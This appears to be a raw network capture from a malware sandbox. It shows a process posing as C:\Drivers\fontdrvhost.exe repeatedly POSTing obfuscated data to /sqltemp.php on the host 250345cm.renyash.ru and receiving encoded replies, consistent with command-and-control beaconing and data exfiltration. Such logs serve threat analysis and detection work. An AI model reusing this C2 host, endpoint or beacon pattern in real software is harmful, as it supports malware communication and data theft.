                                                                                                                                                                                            Jan 1, 2025 14:52:36.962460041 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:37.308198929 CET1012OUTData Raw: 53 54 5a 56 54 5c 54 55 58 56 52 59 56 5c 59 55 5b 53 54 5e 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: STZVT\TUXVRYV\YU[ST^U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/. <.3?;:-V '+9=$X#!/Z*(%C1<#R,*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:37.438461065 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:37.688648939 CET810INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:37 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VtNvD0%2FPiWoydBcMa4tM5gQhzM7D%2BsA7VnSvr7F202zTUj43%2FROvaVcIYa7w4WieKX9s7LKY8SDfWFvk8pI%2BncSOZPgNnhwcKA%2B%2FPkYnimG8Pf40OLk4KM4ePrHFw9b010QxppvM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fda9ab9d6a5b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5280&min_rtt=1763&rtt_var=7695&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=48831&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            43192.168.2.449790104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806979895 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:38.152055979 CET1012OUTData Raw: 53 50 5f 5c 54 5b 51 55 58 56 52 59 56 5b 59 56 5b 5a 54 5d 55 5f 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SP_\T[QUXVRYV[YV[ZT]U_P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0<% =%=#,)" ;+(== \42<*(9D$/49&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:52:38.291757107 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:38.547609091 CET804INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:38 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJPEqPFECk2AWQOoouqw9yMcanfEFtPZJgUWbhgQWr%2B8QA2EWYMWTpx%2BnMcCNuaGWV0MhldNVF2A8kKKQIrCAB46wgiV6UBWdmv2Plt427kNNxv4Wt1U7GjHFXpBsXEcN6bmTg%2Bf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdaf0ee85e6b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1648&rtt_var=4185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=91725&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            44192.168.2.449791104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:38.667593956 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:39.026979923 CET1012OUTData Raw: 53 54 5f 51 54 5c 51 50 58 56 52 59 56 50 59 56 5b 53 54 5f 55 5f 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_QT\QPXVRYVPYV[ST_U_PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0%X Y-\0+;" - _(9V> "+[<!D2,.*&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:39.136480093 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:39.393894911 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:39 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vdcT2l4jTWy7uOmvAH%2FntA509eDgIlQE4iMTlWpTWOULFMta1ZIv4eh3hSyr0tZot96Ij71ZKB1%2Fb6cxwCgoGHid0aWKQu%2FdrQMd1tu%2FMC2jP9NmYynsR8r3nEqVAWGduRT%2BYkcI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdb44b008cb3-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7365&min_rtt=2029&rtt_var=11433&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=32648&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            45192.168.2.449792104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:39.513586044 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:39.872229099 CET1012OUTData Raw: 56 50 5f 5d 54 58 54 5d 58 56 52 59 56 51 59 50 5b 5a 54 5e 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_]TXT]XVRYVQYP[ZT^UUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^&?&"?!\'-'C/!S4.$^*9?U= #4+-2#.:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:39.973073006 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:40.145785093 CET804INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:40 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsHJctO3HyMt0jH4uvqTZD5MV55LEhEOedFSe3M%2FpObSfgOs6T4Wa2WDF0jz4QqRQirLY2xwKDGrrCJuLSkSPqWwTxZDXAhk9zwsXs5DYZDgxkyMVCSPA%2FWA1ny8Ue66%2F3cx2ozg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdb98f9fde99-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3470&min_rtt=1490&rtt_var=4519&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=84242&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            46192.168.2.449793104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:40.275779963 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:40.620811939 CET1012OUTData Raw: 56 57 5f 5c 51 58 51 50 58 56 52 59 56 58 59 52 5b 5d 54 58 55 5d 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VW_\QXQPXVRYVXYR[]TXU]P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$,: /$#/\=U4-*:7W*>< 7\<;-E&'U,:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:40.724850893 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:40.992047071 CET799INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:40 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=flOvHcs95%2FsMyRFVlgHEsMI9hMNTwBVlcbiFPtJp6keOQPAx5PX1mgPeykRCuTxNBOwEqXTvo%2B1WkA%2FrF1cISNIsbkbLLdj2I7A2miOTIcqmDmCnesPwmxmCHylGYZrb43inriO2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdbe4b53c472-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3173&min_rtt=1467&rtt_var=3964&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=96548&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X
                                                                                                                                                                                            Jan 1, 2025 14:52:41.079430103 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            47192.168.2.449794104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:41.198474884 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:41.543543100 CET1012OUTData Raw: 53 53 5f 54 54 50 51 56 58 56 52 59 56 5b 59 55 5b 5c 54 5b 55 59 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SS_TTPQVXVRYV[YU[\T[UYPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/>"/)%.,%T7$+8*.?#"3?+.%-*&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:52:41.642235041 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:41.825586081 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:41 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2AAO8EwPi9gqT0nMBBD1lxxjLWdl%2BNwImsMi%2B%2FESH8Gul4u5sSjbftuFOSUQnu6xRcp8pHn3b8YD6grU2zSB3X7OknkxdXfxcDOqo%2BQRo%2B2RlksPHveBGhSShRTYKas8zZzGCdh0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdc3ffbbc411-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3850&min_rtt=1667&rtt_var=4992&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=76303&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            48192.168.2.449795104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:41.947452068 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:42.292756081 CET1012OUTData Raw: 56 50 5f 51 51 5b 54 57 58 56 52 59 56 5a 59 51 5b 5a 54 51 55 58 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_QQ[TWXVRYVZYQ[ZTQUXPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'" ?&37C,!=<+9=/!!/Y("1/;T,:&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:52:42.403363943 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            49192.168.2.449796104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:42.662996054 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1824
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:43.011396885 CET1824OUTData Raw: 56 55 5f 57 51 5a 54 54 58 56 52 59 56 5f 59 50 5b 52 54 5c 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VU_WQZTTXVRYV_YP[RT\U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3?54<-03.:7*))X$X 2Z+B&,-:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:52:43.107198954 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:43.291773081 CET953INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:43 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KcGdgCY0%2Bb9t3mFN02VfDMA4T62ZyP8leR92dtu4cyB2ZGoxxI%2B4QpAE8hCWy6kqifuqHWr69qyJ07mw5Kr9AVQSceQY42owA%2BV6Rw09PMKzb0JVo8J0cjP2nkEg5dhvsRzOXxJ7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdcd2a1f4406-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4372&min_rtt=1694&rtt_var=5991&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2143&delivery_rate=63154&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 0d 28 2e 32 50 25 54 30 13 2b 03 09 1f 25 10 21 00 2b 38 07 04 27 3d 3c 03 3e 39 3c 04 21 12 36 03 31 28 38 58 23 04 24 06 27 34 2b 59 05 1c 20 06 21 01 0e 13 28 2d 2f 5d 27 3c 2a 01 26 2e 2b 05 2a 2b 34 53 23 38 27 13 27 2d 15 05 2a 14 3f 0a 26 2c 2b 5b 2e 2f 2d 54 26 2a 2c 54 00 11 26 51 33 0f 30 59 20 27 28 5d 35 21 1b 1d 26 27 32 57 26 5a 3f 50 23 17 07 07 25 54 23 5b 22 33 3e 5b 26 15 00 00 37 3e 28 0b 3e 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&(.2P%T0+%!+8'=<>9<!61(8X#$'4+Y !(-/]'<*&.+*+4S#8''-*?&,+[./-T&*,T&Q30Y '(]5!&'2W&Z?P#%T#["3>[&7>(>%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            50192.168.2.449797104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:42.775713921 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:43.120798111 CET1012OUTData Raw: 56 5f 5f 56 54 5b 54 5d 58 56 52 59 56 5c 59 57 5b 58 54 5d 55 54 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V__VT[T]XVRYV\YW[XT]UTPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z&?5["<&%.A,#[0<8)<X47(+1,?V-*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:43.221460104 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:43.482471943 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:43 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NksHlKzi6mqFebjkLEYhkzf7Lk4cQFODBPYyEylnMD1gPkf0Dn6S2%2BT8i0nME%2FJXwD4xAJA0tOIng%2Fk5pFnvlTaVw1lMCJEv94%2FYPlvKzLA78cOcKJ4xys1KIBQlPVBM9tLphbiN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdcddc096a57-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
